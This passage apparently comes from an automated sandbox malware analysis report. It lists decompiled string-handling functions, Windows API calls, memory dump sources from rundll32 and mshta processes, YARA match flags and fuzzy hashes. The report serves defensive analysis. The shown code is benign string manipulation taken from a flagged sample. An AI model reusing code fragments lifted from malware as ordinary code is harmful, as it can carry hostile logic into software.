						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                          0x04895296
                                          0x048952a0
                                          0x048952a2
                                          0x048952a8
                                          0x048952a8
                                          0x048952b1
                                          0x048952b5
                                          0x048952c1
                                          0x048952c5
                                          0x04895339
                                          0x048952c7
                                          0x048952c7
                                          0x048952cb
                                          0x048952d0
                                          0x048952d5
                                          0x048952ef
                                          0x048952de
                                          0x048952de
                                          0x048952e2
                                          0x048952e5
                                          0x048952ea
                                          0x048952ea
                                          0x048952f4
                                          0x0489531c
                                          0x04895322
                                          0x04895325
                                          0x048952f6
                                          0x048952f8
                                          0x04895300
                                          0x0489530b
                                          0x04895310
                                          0x04895310
                                          0x0489532c
                                          0x04895333
                                          0x04895334
                                          0x04895334
                                          0x048952c5
                                          0x04895344

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,04894BF5,?,?,?,?,00000102,04895388,?,?,00000000), ref: 048952A2
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                            • Part of subcall function 048979D7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,048952D0,00000000,00000001,00000001,?,?,04894BF5,?,?,?,?,00000102), ref: 048979E5
                                            • Part of subcall function 048979D7: StrChrA.SHLWAPI(?,0000003F,?,?,04894BF5,?,?,?,?,00000102,04895388,?,?,00000000,00000000), ref: 048979EF
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04894BF5,?,?,?,?,00000102,04895388,?), ref: 04895300
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04895310
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0489531C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: f4c1f75583e6bc163fb51e9991895c5dd56cc8da929bf35c5def550f5bf0a237
                                          • Instruction ID: 81fd9f36bdbabcbe6da8bcda8f18a013442ab7c9e19abb4692103367544c7495
                                          • Opcode Fuzzy Hash: f4c1f75583e6bc163fb51e9991895c5dd56cc8da929bf35c5def550f5bf0a237
                                          • Instruction Fuzzy Hash: 0721C372504A59BFCF126FB8C844A9E7FE9EF16244B4C4A54F805DB201D674ED01D7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5F123 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?,?,00000000), ref: 00B5F12F
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                            • Part of subcall function 00B727EB: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00B5F15D,00000000,00000001,00000001,?,?,00B6C0A9,00000000,00000000,00000004,00000000), ref: 00B727F9
                                            • Part of subcall function 00B727EB: StrChrA.SHLWAPI(?,0000003F,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?), ref: 00B72803
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?), ref: 00B5F18D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B5F19D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B5F1A9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 461a77c73d52faf25b25c4a67fc66f6423b2768440cf16b908db456a0af1cacc
                                          • Instruction ID: dc300fb8f1b7f9fe489802ae9e2369629bebc1544569a4a3b4223dc3aef11b32
                                          • Opcode Fuzzy Hash: 461a77c73d52faf25b25c4a67fc66f6423b2768440cf16b908db456a0af1cacc
                                          • Instruction Fuzzy Hash: 32219072504616EBCB126F68CC84AAABFECDF06381B0580E5FD09AB212DB35D94497A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6A5AD Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 280e02b369eb955c104324183c048bd4a622080a89de0441f21e1e2b9aab48cb
                                          • Instruction ID: f5be54fa70843a2077d3f2bee3be598be46012608e27ecb8733187f33608fad0
                                          • Opcode Fuzzy Hash: 280e02b369eb955c104324183c048bd4a622080a89de0441f21e1e2b9aab48cb
                                          • Instruction Fuzzy Hash: C7119172500509BBCB20AFA0DC81A6677B8FF09310B080598FA4469851EB76F9B2DFD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04896203 Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04896203(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04894DF6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                          0x04896218
                                          0x0489621c
                                          0x04896226
                                          0x0489622b
                                          0x04896230
                                          0x04896232
                                          0x0489623a
                                          0x0489623f
                                          0x0489624d
                                          0x04896252
                                          0x0489625c

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,76D85520,00000008,052493CC,?,04896861,004F0053,052493CC,?,?,?,?,?,?,04896BB4), ref: 04896213
                                          • lstrlenW.KERNEL32(04896861,?,04896861,004F0053,052493CC,?,?,?,?,?,?,04896BB4), ref: 0489621A
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • memcpy.NTDLL(00000000,004F0053,76D869A0,?,?,04896861,004F0053,052493CC,?,?,?,?,?,?,04896BB4), ref: 0489623A
                                          • memcpy.NTDLL(76D869A0,04896861,00000002,00000000,004F0053,76D869A0,?,?,04896861,004F0053,052493CC), ref: 0489624D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: d89360c93a86468641784a4565eee9f5cc4eb20022480a03910fa4439600991a
                                          • Instruction ID: 2fe099601debc5676fab0a512855c0a995b89f21e5bdbe6a19098f5d92936dd5
                                          • Opcode Fuzzy Hash: d89360c93a86468641784a4565eee9f5cc4eb20022480a03910fa4439600991a
                                          • Instruction Fuzzy Hash: B4F03776900518BB8F11EFE8CC89C8E7BACEF492587094562E904E7201EA71EE118BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B65350 Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(69B25F44,?,?,00000000,00B6385A,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 00B65361
                                          • lstrlen.KERNEL32(?,?,?,?), ref: 00B65366
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 00B65382
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B653A0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                          • String ID:
                                          • API String ID: 1697500751-0
                                          • Opcode ID: 5588e7fc4d9824ab44947a4004dd5951574ad1499d652cb648bc20e9270310a1
                                          • Instruction ID: 1f25f40449540db38f903c48d53f228aeb11c69939d4f6e64aba9581d1028256
                                          • Opcode Fuzzy Hash: 5588e7fc4d9824ab44947a4004dd5951574ad1499d652cb648bc20e9270310a1
                                          • Instruction Fuzzy Hash: 90F0F6B7404B41ABD73157AD9C48E1BBBDCEFC4751F090495FA4A87201E739D8148BB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893970 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(05249B90,00000000,00000000,7477C740,04896568,00000000), ref: 04893980
                                          • lstrlen.KERNEL32(?), ref: 04893988
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • lstrcpy.KERNEL32(00000000,05249B90), ref: 0489399C
                                          • lstrcat.KERNEL32(00000000,?), ref: 048939A7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: ae422d91da4bae722a44135b089e629bd0303e02b62d295558c6391fa323aed3
                                          • Instruction ID: 917173ac3ae9379652f2c9c9870d82f9dc2f25b61cf16dc84cb9f6e10429e4cc
                                          • Opcode Fuzzy Hash: ae422d91da4bae722a44135b089e629bd0303e02b62d295558c6391fa323aed3
                                          • Instruction Fuzzy Hash: 8FE09B735019207B4B116BA89C48C5FB7ACEF8965170C0D1AFA00D3200CB299C01CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6E631 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(06148560,00000000,00000000,76DC81D0,00B5ACFB,00000000), ref: 00B6E641
                                          • lstrlen.KERNEL32(?), ref: 00B6E649
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(00000000,06148560), ref: 00B6E65D
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B6E668
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 38e0972d80a4d5ca330b5220e6d6a57cc4ba1435048bcd105feb25f693b95ac2
                                          • Instruction ID: daef6660bbd7a1c752aea7548f7ee90c43d99e40ca03f7cb1f65433a9ec760e1
                                          • Opcode Fuzzy Hash: 38e0972d80a4d5ca330b5220e6d6a57cc4ba1435048bcd105feb25f693b95ac2
                                          • Instruction Fuzzy Hash: 88E09233501220A78A115BE8AC48C5FBBACEF897123050416F705D3110CB25D8008BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 00000273CE000FB9 Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000003.600379413.00000273CE000000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000273CE000000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_3_273ce000000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                          • Instruction ID: f654f67ee6e742abf579e5fc2dd81804b08288b2531d675a54f79a349c366c5f
                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                          • Instruction Fuzzy Hash: BF9002044D941655E41551920C4926D50816388251FD44886441AB0544D84D03963193
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00000273CE000FC1 Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000003.600379413.00000273CE000000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000273CE000000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_3_273ce000000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                          • Instruction ID: f654f67ee6e742abf579e5fc2dd81804b08288b2531d675a54f79a349c366c5f
                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                          • Instruction Fuzzy Hash: BF9002044D941655E41551920C4926D50816388251FD44886441AB0544D84D03963193
                                          Uniqueness

                                          Uniqueness Score: -1.00%